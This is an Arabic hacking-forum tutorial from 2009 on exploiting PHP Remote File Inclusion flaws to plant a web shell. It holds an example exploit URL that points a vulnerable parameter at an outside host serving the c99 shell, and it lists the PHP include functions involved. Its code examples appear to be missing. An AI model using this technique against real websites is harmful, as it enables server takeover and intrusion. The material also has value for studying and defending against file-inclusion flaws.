مرحبا بك في المنتدى


    الدرس الثالث شرح Remote file include

    شاطر
    avatar
    حسن المصري
    مدير المنتدى
    مدير المنتدى

    عدد الرسائل : 181
    العمر : 25
    المزاج : زي العسل
    تاريخ التسجيل : 27/08/2007

    الدرس الثالث شرح Remote file include

    مُساهمة من طرف حسن المصري في 5/13/2009, 15:27


    بسم الله الرحمن الرحيم

    بعد ماعرفنا انواع الثغرات وكل ثغره ايه الفائده منه لازم نعرف كل ثغره ازي ممكن نستثمر الثغره في رفع الشل

    Remote file include

    الثغره دي دايما في صفحات

    PHP
    ودي لغه برمجه صفحات النت
    ازي تعرف ان الصفحه بي اش بي ولا مش بي اتش بي
    صفحات البي اش بي تبدء
    PHP


    ويكون السبب في الثغره حاجه اسمه الداله
    الى هي

    INCLUDE



    امر من اوامر الابي اتش بي يقوم باستدعاء الملف من اي مكان وتطبق الى فيه


    الحاجه التانيه الي تفيدنه
    $
    المتغير
    اهم حاجه في ثغرة الانكلود الى هي بتسمح التعديل على مكان الانكلود

    Remote file include


    مثال
    PHP

    ده المثال في متغير الى هو $
    وده معناه انك ممكن تستغله في انك تعمل انكلود لاي صفحه من اي مكان
    باي صفحه من خارج الموقع الى هو الشل
    طيب لو مفيش متغير الى هو $ ماينفع استغلال ثغره الانكلود
    ويكون استغلال لو في متغير على المثال الى فوق
    http://www.web.com/filname.php?ha$$anhi5=www.hassan.com/c99.txt?


    http://www.web.com اسم الموقع الى عليه الثغره
    /filname.php? دي الصفحه الى فيه الانكلود
    ha$$anhi5= المتغير الى مكتوب في الصفحه
    www.hassan.com/c99.txt? رابط الشل يكون

    افتكر علامت الاستفهام
    عشان ملف التكست يفتح بي اتش بي

    وافتكر لازم يكون في متغير الى هو $ عشان تقدر تغير الانكلود الاصلى الى اي صفحه

    وامشاء الله في شرح فديو لكشف واستغلال الثغره


    والكلمات الداله على الانكلود
    Include

    Include _once
    Require_once

    ومش اي متغير يكون انكلود في متغيرات بتكون في قواعد البينات الى هي

    Sql
    وانشاء الله في دوره لاحتراف حقن قواعد البينات الى هي
    Sql injection



    الدرس الجاي شرح ثغره
    Remote commands execution

    وهي شبيه بثغره الانكلود


      الوقت/التاريخ الآن هو 10/18/2018, 02:15